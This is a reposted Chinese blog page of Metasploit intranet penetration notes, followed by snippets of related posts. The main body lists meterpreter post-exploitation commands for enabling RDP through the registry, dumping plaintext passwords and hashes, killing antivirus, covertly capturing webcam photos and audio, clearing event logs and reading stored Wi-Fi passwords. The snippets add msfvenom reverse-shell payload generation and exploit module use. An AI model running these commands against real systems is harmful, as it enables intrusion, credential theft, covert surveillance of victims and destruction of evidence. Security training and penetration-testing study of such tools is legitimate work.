MSF 内网渗透笔记

最新推荐文章于 2024-07-10 12:09:21 发布
最新推荐文章于 2024-07-10 12:09:21 发布
阅读量259 收藏 1
点赞数
原文链接:http://www.cnblogs.com/xiaozi/p/9258433.html
版权

 

进入meterpreter模式

在meterpreter中输入shell即可进入CMD窗口
接着即可执行CMD命令,例如打开RDP服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

meterpreter模式

1、输入screenshot截个图看看主人在干什么吧。

2、wdigest //抓取明文密码(需加载mimikatz模块)

3、bgrun killav //杀掉杀毒软件

4、webcam_list //查看有没有摄像头

bgrun webcam //启动摄像头

webcam_snap -i 1 -v false //启动摄像头拍摄一张照片但不打开闪光灯

bgrun sound_recorder //启动声音录制

5、bgrun hashdump //获取哈希值

6、clearev //清除日志

 

 

7、bgrun post/windows/wlan/wlan_profile //读取无线连接的账号密码

此处执行失败换一种方式

在cmdshell下执行netsh wlan show profiles

 

 

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

 

参考链接:

https://www.bodkin.ren/index.php/category/Tricks/

使用 MSF 路由转发实现MSF框架的内网渗透

https://www.anquanke.com/post/id/86505

MSF框架实现“永恒之蓝”的闪电攻击

https://www.anquanke.com/post/id/86245

转载于:https://www.cnblogs.com/xiaozi/p/9258433.html

an0708
关注
【网络安全】MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2904
内网渗透超级强悍
msf内网渗透
10-29
msf内网渗透
metasploit渗透测试笔记(内网渗透篇)
baidu_22850205的专栏
11-02 979
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
内网渗透MSF渗透阶段常用操作笔记
最新发布
uuzeray的博客
07-10 817
1、先看下目标靶机已存在用户 meterpreter中输入:run post/windows/gather/enum_logged_on_users。6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。启动远程桌面协议:run post/windows/manage/enable_rdp。
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2296
MSF多层内网渗透全过程
利用Metasploit Framework(msf)进行内网(域)渗透
初学者L_言的博客
07-03 5612
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
CTF内网渗透笔记
qq_26579613的博客
11-10 3952
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
kali内网渗透学习笔记
goodhu的博客
03-09 2165
kali内网渗透学习笔记 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=33333 -f exe x> /root/桌面/test1.exe LHOST是主机ip ,LPORT是自己设置的端口号 使用msfconsole监听木马(依次输入下列命令) use exp...
内网渗透自己的笔记
xingxingdoukeyi的博客
10-22 272
拿到shell进入内网后虽然ms17010横行但也是不能拿着扫描器到处扫的,每一步都应该小心谨慎 首先在下认为应该判断是否为虚拟机,docker,蜜獾等 docker通常会有一些命令not find例如ifconfig uname-a 等 如果打着四面漏风的系统多半就是蜜獾了,而且里面没有正经的办公痕迹的也很可疑 vm虚拟机为运行xchg ecx,eax 时间大于0xFF时可以确定 //使用如下命令判断docker ls -alh ./dockerenv cat /proc/1/cgroup //没有i
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
xueshenlaila的博客
03-02 3247
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
红队内网攻防渗透内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 286
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
内网渗透笔记——msf
wang_zui_zui的博客
01-22 4739
Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000 //发包的极限速度 masscan 0.0.0.0/0 -p 0-65535 //扫描整个互联网的所有端口 不要轻易尝试....... Metasploit(msf) 一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击 早期想要利用漏洞——需知道漏洞的poc和exp...
MSF内网渗透实战
hackzkaq的博客
05-17 3895
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4228
内网渗透木马测试
内网渗透 Metasploit(MSF)基础使用
Innocence_0的博客
03-09 1017
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
渗透实战:内网渗透_内网渗透实例
2201_75735270的博客
05-10 858
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
渗透测试(一)-Msf生成免杀后门(内网篇)
阿航的博客
05-25 2949
实验环境: 攻击机:kali linux-2021.1(192.168.56.128) 靶机:Windows10(192.168.1.120) 推荐两个免费在线木马检测网站:VirusScan和VirusTotal 原理图: 1. Meterpreter简介 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作为攻击载荷能够获得目标系统的一个Meterpre..
MSF渗透测试实战指南:从信息收集到漏洞利用
例如,优先扫描已知存在溢出漏洞的高危端口,如22(SSH)、445(SMB)、3389(RDP)等,一旦发现可利用的漏洞,就可以进一步尝试权限提升和内网渗透。 在进行渗透测试时,必须遵循道德规范和法律法规,确保测试行为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值